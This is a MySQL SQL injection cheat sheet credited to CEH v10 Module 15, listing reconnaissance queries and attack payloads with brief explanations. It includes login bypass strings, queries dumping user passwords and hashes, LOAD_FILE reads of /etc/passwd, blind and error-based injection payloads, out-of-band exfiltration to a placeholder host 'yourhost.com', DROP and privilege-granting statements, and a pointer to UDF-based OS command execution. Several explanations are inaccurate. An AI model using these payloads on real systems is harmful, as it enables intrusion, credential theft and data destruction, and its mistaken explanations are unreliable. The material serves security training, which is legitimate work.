Query Command
VersionSELECT @@VERSION; — This command retrieves the system information of the current installation of SQL Server.
  SELECT version(); — This command selects the specific version of a Server.
List UsersSELECT user FROM mysql.user;  — This command lists the column ‘user’ from the table ‘mysql.user’.
Current UserSELECT user(); This command obtains the current MySQL user name and hostname.
 SELECT system_user(); This command obtains the current value of system_user.
List all DatabaseSELECT schema_name FROM information_schema.schemata;  for MySQL >= v5.0 This command obtains a column name ‘schema_name’ having a list of databases from the table ‘schemata table’.
 SELECT distinct(db) FROM mysql.db; — priv
Current DatabaseSELECT database(); This command obtains the current MySQL database.
List TablesSELECT table_name FROM information_schema.tables WHERE table_schema = ‘tblUsers’  This command obtains the column name ‘table_name’ from the table ‘information_schema.tables’ having table_schema value ‘tblUsers’. tblUsers -> tablename
Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = ‘tblUsers’ This command obtains the columns name ‘table_name’ and ‘column_name’ from the table ‘information_schema.tables’ having table_schema value ‘tblUsers’. tblUsers -> tablename

 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; This command obtains the columns name ‘table_name’ and ‘column_name’ from the table ‘information_schema.tables’ having table_schema value ‘username’.
Select Nth RowSELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; — This command returns rows numbered from 0. SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;   This command returns rows numbered from 0.
Select Nth CharSELECT substr(‘abcd’, 3, 1);  This command returns c.
If StatementSELECT if(1=1,’foo’,’bar’); — returns ‘foo’
Case StatementSELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END;  This command returns A.
CommentsSELECT 1; #comment — This command is used for writing a comment. SELECT /*comment*/1; — This command is used comment out a statement.
String without QuotesSELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) —  This command returns ‘KLM’.
Time DelaySELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5);  >= 5.0.12 —  This command triggers a measurable time delay.
Command ExecutionIf mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.
Make DNS RequestsN/A
Load File‘ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — SELECT LOAD_FILE(0x633A5C626F6F742E696E69) This command will show the content of c:\boot.ini.

log in as admin userDROP sampletable;– DROP sampletable;# Username : admin’–                    : admin’ or ‘1’=’1′– SELECT * FROM members WHERE $username = ‘admin’–‘ AND $password = ‘password’ This command lists all the users from the column ‘members’ having $username value as ‘admin’ and $password value as ‘password’.
List PasswordsSELECT user, password FROM mysql.user; This command retrieves the columns ‘user’ and ‘password‘ from the table ‘mysql.user’. SELECT user, password FROM mysql.user LIMIT 1,1; This command retrieves the columns ‘user’ and ‘password‘ from the table ‘mysql.user’ with LIMIT 1,1.
 SELECT password FROM mysql.user WHERE user = ‘root’; This command retrieves the column ‘password‘ from the table ‘mysql.user’ having user value as ‘root’.
List Password HashesSELECT host, user, password FROM mysql.user;  — This command lists columns ‘host’, ‘user’ and ‘password’ from the table ‘mysql.user’.
Bulk InsertSELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — This command is used to insert a file content to a table.
Create UsersCREATE USER username IDENTIFIED BY ‘password’; — This command creates a username ‘USER’ who authenticates by password to log on to the database.
Drop UserDROP USER username; — This command drops a username ‘USER’ from the table.
Make User DBAGRANT ALL PRIVILEGES ON *.* TO [email protected]’%’; — This command grants DBA privileges to a user.
Local File Access…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)  — This command allows you to only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’;  — This command allows you to write to file system.
Hostname, IP AddressSELECT @@hostname; — This command obtains the Hostname and IP address of a

 system.
Error Based SQLi attack: To throw conversion errors. (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1));  — This command is used to receive integer inputs. ‘+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+’;  — This command is used to receive string inputs.
Clear SQLi Tests: For Boolean SQL injection and silent attacksproduct.php?id=4 product.php?id=5-1  product.php?id=4 OR 1=1 product.php?id=-1 OR 17-7=10 — These commands can be used to test for Boolean SQL injection and silent attacks.
Blind SQL Injection (Time Based)SLEEP(25)–  SELECT BENCHMARK(1000000,MD5(‘A’)); ProductID=1 OR SLEEP(25)=0 LIMIT 1— ProductID=1) OR SLEEP(25)=0 LIMIT 1– ProductID=1′ OR SLEEP(25)=0 LIMIT 1— ProductID=1′) OR SLEEP(25)=0 LIMIT 1–
 ProductID=1)) OR SLEEP(25)=0 LIMIT 1—
 ProductID=SELECT SLEEP(25)— —  These commands trigger a measurable time delay.
Time base SQLi exploitation?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1— {INJECTION} = You want to run the query. — If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Out of Band Channel?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat(‘\\\\’,({INJECTION}), ‘yourhost.com\\’))); This command makes a NBNS query request/DNS resolution request to yourhost.com. ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE ‘\\\\yourhost.com\\share\\output.txt’); This command writes data to your shared folder/file.
 {INJECTION} = You want to run the query.
Default Databasesinformation_schema (>= mysql 5.0) mysql
Path of DB filesSELECT @@datadir C:\AppServ\MySQL\data\
Location of DB FilesSELECT @@datadir; This command obtains the location of DB files.
privilegesSELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — This command lists list user privileges. SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;  — This command lists list various types of privileges. 
 list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;  — This command lists privileges on databases (schemas).
 SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;  — This command lists privileges on columns.

Sumber: CEH v.10. Module 15: SQL Injection